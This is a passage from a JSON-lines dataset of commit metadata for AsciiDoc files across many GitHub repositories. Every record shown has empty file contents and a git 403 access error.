403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"7695a05999192925f12e222159f1196b1db58013","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/01\/28\/deref.adoc","new_file":"content\/news\/2022\/01\/28\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7f82f94b6186ff8aaf6067b0a96eefef520ce742","subject":"Add clustering doc","message":"Add clustering doc\n","repos":"curso007\/camel,drsquidop\/camel,apache\/camel,adessaigne\/camel,snurmine\/camel,cunningt\/camel,ullgren\/camel,mcollovati\/camel,isavin\/camel,sverkera\/camel,tdiesler\/camel,tadayosi\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,sverkera\/camel,apache\/camel,anoordover\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,objectiser\/camel,drsquidop\/camel,anton-k11\/camel,akhettar\/camel,apache\/camel,dmvolod\/camel,pmoerenhout\/camel,rmarting\/camel,Fabryprog\/camel,davidkarlsen\/camel,isavin\/camel,ullgren\/camel,dmvolod\/camel,apache\/camel,tadayosi\/camel,pmoerenhout\/camel,nicolaferraro\/camel,onders86\/camel,isavin\/camel,adessaigne\/camel,Fabryprog\/camel,anoordover\/camel,alvinkwekel\/camel,gautric\/camel,anton-k11\/camel,akhettar\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,adessaigne\/camel,rmarting\/camel,nikhilvibhav\/camel,christophd\/camel,Fabryprog\/camel,gautric\/camel,kevinearls\/camel,CodeSmell\/camel,anton-k11\/camel,tdiesler\/camel,christophd\/camel,tdiesler\/camel,cunningt\/camel,dmvolod\/camel,jamesnetherton\/camel,zregvart\/camel,drsquidop\/camel,anoordover\/camel,tadayosi\/camel,isavin\/camel,DariusX\/camel,cunningt\/camel,mcollovati\/camel,sverkera\/camel,rmarting\/camel,jonmcewen\/camel,jonmcewen\/camel,alvinkwekel\/camel,davidkarlsen\/camel,gnodet\/camel,zregvart\/camel,punkhorn\/camel-upstream,sverkera\/camel,christophd\/camel,snurmine\/camel,jamesnetherton\/camel,christophd\/camel,christophd\/camel,Fabryprog\/camel,kevinearls\/camel,apache\/camel,jonmcewen\/camel,anton-k11\/camel,curso007\/camel,anton-k11\/camel,DariusX\/camel,snurmine\/camel,jamesnetherton\/camel,akhettar\/camel,objectiser\/camel,pax95\/camel,tadayosi\/camel,punkhorn\/camel-upstream,cunningt\/camel,pax95\/camel,snurmine\/camel,anton-k11\/camel,CodeSmell\/camel,isavin\/camel,jonmcewen\/camel,nicolaferraro\/camel,tadayosi\/camel,gnodet\/camel,DariusX\/camel,drsquidop\/camel,sverkera\/camel,curso007\/camel,snurmine\/camel,akhettar\/camel,DariusX\/camel,rmarting\/camel,gautric\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,tdiesler\/camel,drsquidop\/camel,gautric\/camel,tadayosi\/camel,onders86\/camel,kevinearls\/camel,Thopap\/camel,punkhorn\/camel-upstream,zregvart\/camel,davidkarlsen\/camel,onders86\/camel,cunningt\/camel,jonmcewen\/camel,isavin\/camel,gautric\/camel,gnodet\/camel,nicolaferraro\/camel,rmarting\/camel,pax95\/camel,alvinkwekel\/camel,kevinearls\/camel,drsquidop\/camel,jamesnetherton\/camel,curso007\/camel,anoordover\/camel,CodeSmell\/camel,onders86\/camel,CodeSmell\/camel,nicolaferraro\/camel,Thopap\/camel,christophd\/camel,Thopap\/camel,adessaigne\/camel,objectiser\/camel,curso007\/camel,ullgren\/camel,apache\/camel,pax95\/camel,gautric\/camel,cunningt\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pax95\/camel,rmarting\/camel,zregvart\/camel,anoordover\/camel,objectiser\/camel,dmvolod\/camel,adessaigne\/camel,Thopap\/camel,pmoerenhout\/camel,jamesnetherton\/camel,gnodet\/camel,dmvolod\/camel,nikhilv
ibhav\/camel,mcollovati\/camel,dmvolod\/camel,kevinearls\/camel,pax95\/camel,ullgren\/camel,Thopap\/camel,curso007\/camel,alvinkwekel\/camel,snurmine\/camel,onders86\/camel,pmoerenhout\/camel,kevinearls\/camel,onders86\/camel,akhettar\/camel,mcollovati\/camel,Thopap\/camel,anoordover\/camel,sverkera\/camel,tdiesler\/camel,akhettar\/camel","old_file":"camel-core\/src\/main\/docs\/clustering.adoc","new_file":"camel-core\/src\/main\/docs\/clustering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"176795ce227539cc6c0690524e01e4e5153a2ce9","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bacc18570c08262479db24d7f0041fc5aa77a9c","subject":"Update 2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","message":"Update 2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","new_file":"_posts\/2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e04704284f406d28b3e6c187bac94b02529f8443","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"220c704431b40e7988b2594821ff97812cf9e523","subject":"Update 2017-05-31-My-English-Title.adoc","message":"Update 2017-05-31-My-English-Title.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-05-31-My-English-Title.adoc","new_file":"_posts\/2017-05-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"405665e782f87a8ad2916e36efeb25a7aec06bff","subject":"y2b create post Threadless Order Unboxing! 
Super Tees!","message":"y2b create post Threadless Order Unboxing! Super Tees!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-25-Threadless-Order-Unboxing-Super-Tees.adoc","new_file":"_posts\/2011-03-25-Threadless-Order-Unboxing-Super-Tees.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46f7aabab5396ce2f2cd80784851146876f3cf3c","subject":"First draft of parameter syntax CIP","message":"First draft of parameter syntax CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2016-07-07-Parameter-syntax.adoc","new_file":"cip\/CIP2016-07-07-Parameter-syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b72835a54384ece685de3224e6e17c93756fc96","subject":"Fix Typos","message":"Fix Typos","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain","old_file":"src\/docs\/manual\/02_install.adoc","new_file":"src\/docs\/manual\/02_install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4762d981408cba1d58ffaade1c15f5ce39bff051","subject":"Update 2010-06-26-Android-21-tient-la-moitie-du-parc.adoc","message":"Update 2010-06-26-Android-21-tient-la-moitie-du-parc.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-06-26-Android-21-tient-la-moitie-du-parc.adoc","new_file":"_posts\/2010-06-26-Android-21-tient-la-moitie-du-parc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"335b2b3d462564450b47cc02d99dd63227d2b2f6","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aacb28effec26229c7a5b2e75922fb8c682600b0","subject":"y2b create post You've Never Seen A Drone Like This...","message":"y2b create post You've Never Seen A Drone Like 
This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-01-Youve-Never-Seen-A-Drone-Like-This.adoc","new_file":"_posts\/2016-11-01-Youve-Never-Seen-A-Drone-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36b06a1d117098b127eb0e8753bee2991929eaee","subject":"Publish 2016-1-1-Puzzle-8-Matrix.adoc","message":"Publish 2016-1-1-Puzzle-8-Matrix.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2016-1-1-Puzzle-8-Matrix.adoc","new_file":"2016-1-1-Puzzle-8-Matrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce5c9b8b2c49a79aa14d77f0726c31aaa5f0a281","subject":"Update 2017-12-18-P-H-Per-Golang.adoc","message":"Update 2017-12-18-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b926040364066d07d19ab04c7516186f4bbf762","subject":"Create 2015-09-17-forge-2.19.2.final.asciidoc","message":"Create 2015-09-17-forge-2.19.2.final.asciidoc","repos":"luiz158\/docs,forge\/docs,forge\/docs,luiz158\/docs","old_file":"news\/2015-09-17-forge-2.19.2.final.asciidoc","new_file":"news\/2015-09-17-forge-2.19.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b1479d8acce1d9cdeaeb6eb3a5ed666ef751b4f7","subject":"Update 2015-03-19-The-Kojima-affair.adoc","message":"Update 2015-03-19-The-Kojima-affair.adoc","repos":"filipeuva\/filipeuva.blog,filipeuva\/filipeuva.blog,filipeuva\/filipeuva.blog","old_file":"_posts\/2015-03-19-The-Kojima-affair.adoc","new_file":"_posts\/2015-03-19-The-Kojima-affair.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/filipeuva\/filipeuva.blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fed44b3a14dcd21b56774d17be5c6fb691d004d5","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef9682d6aae232fda0432d5b21c8fe237ba36259","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f5d90129dcd6b96824ae84d24f68aa286766ddc","subject":"y2b create post This Tiny Laptop Raised $3.5 Million Dollars...","message":"y2b create post This Tiny Laptop Raised $3.5 Million Dollars...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-30-This-Tiny-Laptop-Raised-35-Million-Dollars.adoc","new_file":"_posts\/2017-08-30-This-Tiny-Laptop-Raised-35-Million-Dollars.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94a2dd7cd7bcfcb9f605ecf556904cf2a941166c","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"412be7218b8a40036511f9154701b8ec8bc257ad","subject":"Update 2015-06-08-My-title2.adoc","message":"Update 2015-06-08-My-title2.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-08-My-title2.adoc","new_file":"_posts\/2015-06-08-My-title2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"529c1f04cb6004e832c28d7d6dfbd3df0b58d323","subject":"Documentation on AMR RTP in case of DTX","message":"Documentation on AMR RTP in case of DTX\n\nChange-Id: I394f405b441c1eb000759151bd8350d5b3a84a0b\n","repos":"osmocom\/osmo-bts,osmocom\/osmo-bts,osmocom\/osmo-bts","old_file":"doc\/manuals\/abis\/rtp-amr.adoc","new_file":"doc\/manuals\/abis\/rtp-amr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/osmocom\/osmo-bts.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d9327a39f84f144540f1bc97e43b79c4be0ac780","subject":"Update 2017-02-23-online.adoc","message":"Update 
2017-02-23-online.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-02-23-online.adoc","new_file":"_posts\/2017-02-23-online.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"725b4c661006d7485e1c5c4cc47cdf19f0938699","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3003853f25d05191696bbf4cd62b8a18510e142","subject":"Reformat useful library","message":"Reformat useful library\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f769397162e21f965d60398d658edc1c695faf00","subject":"y2b create post This Slime Could Be Good For Your Phone...","message":"y2b create post This Slime Could Be Good For Your Phone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-01-This%20Slime%20Could%20Be%20Good%20For%20Your%20Phone....adoc","new_file":"_posts\/2018-01-01-This%20Slime%20Could%20Be%20Good%20For%20Your%20Phone....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecdeac7d3814ba4785b3ed1ba41aeef7079debdc","subject":"docs: Use a non-SSH method of installing Gerrit commit hook","message":"docs: Use a non-SSH method of installing Gerrit commit hook\n\nApparently, contributors in China cannot connect to the Gerrit SSH port.\nBecause of this, they cannot follow the How to Contribute directions for\ninstalling the Gerrit commit hook.\n\nThis patch updates those instructions to use HTTPS instead of SSH for\ninstalling the Gerrit commit hook, which should work for everyone.\n\nChange-Id: Ibdb024aafcd601f740ae73d83c54f9659cc5a3a9\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11896\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nTested-by: Grant Henke 
<4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9226db1177131f3a4397e0b1f8b3d8a942e7ec10","subject":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","message":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f046577bb43284a8d41003cc1357f3fdd826ee3b","subject":"New internal design doc","message":"New internal design doc\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/internal_design.adoc","new_file":"userguide\/tutorials\/internal_design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8be4f4583fe630f24844f50c4f2873a665054e02","subject":"Update 2016-11-01-Tis-the-Season-in-Walt-Disney-World.adoc","message":"Update 2016-11-01-Tis-the-Season-in-Walt-Disney-World.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-11-01-Tis-the-Season-in-Walt-Disney-World.adoc","new_file":"_posts\/2016-11-01-Tis-the-Season-in-Walt-Disney-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09d95118e19fee43c2990b2078da7baa6fcc2541","subject":"y2b create post XBOX 360 Wireless Speed Wheel + Forza Motorsport 4 Unboxing","message":"y2b create post XBOX 360 Wireless Speed Wheel + Forza Motorsport 4 Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-01-XBOX-360-Wireless-Speed-Wheel--Forza-Motorsport-4-Unboxing.adoc","new_file":"_posts\/2011-12-01-XBOX-360-Wireless-Speed-Wheel--Forza-Motorsport-4-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31610f18f468c77704c6a4feba60ac3b53672ff8","subject":"editorial fixes","message":"editorial 
fixes\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1376e2cb1244905a98bcc8c6ee8c13bbf3a5117d","subject":"Add new workflow docs","message":"Add new workflow docs\n","repos":"jvalkeal\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-data,cppwfs\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow","old_file":"src\/team\/github-actions-workflows.adoc","new_file":"src\/team\/github-actions-workflows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cppwfs\/spring-cloud-dataflow.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4120914fcc2b3b6e667a3080ab3c16749729de9","subject":"Update 2015-2-10-.adoc","message":"Update 2015-2-10-.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-2-10-.adoc","new_file":"_posts\/2015-2-10-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"366a5eda16ed1fc73d414ffa2fba087b7a073006","subject":"chore(ch4): promise-sequence\u3092\u79fb\u52d5","message":"chore(ch4): 
promise-sequence\u3092\u79fb\u52d5\n","repos":"xifeiwu\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,wenber\/promises-book,liubin\/promises-book,cqricky\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book,dieface\/promises-book,sunfurong\/promise,liubin\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,oToUC\/promises-book,wenber\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,sunfurong\/promise,xifeiwu\/promises-book,purepennons\/promises-book,dieface\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,cqricky\/promises-book,charlenopires\/promises-book,genie88\/promises-book,oToUC\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,liubin\/promises-book,genie88\/promises-book,lidasong2014\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,genie88\/promises-book,purepennons\/promises-book,azu\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book","old_file":"Ch4_AdvancedPromises\/readme.adoc","new_file":"Ch4_AdvancedPromises\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"514c079c534a02960bfff54e37e13aba902a1a06","subject":"Update 2017-04-23-Portable-PostgreSQL-distribution-for-Windows.adoc","message":"Update 2017-04-23-Portable-PostgreSQL-distribution-for-Windows.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2017-04-23-Portable-PostgreSQL-distribution-for-Windows.adoc","new_file":"_posts\/2017-04-23-Portable-PostgreSQL-distribution-for-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2785579dd776f13a3961c4a2e7af1fb17f0121b","subject":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 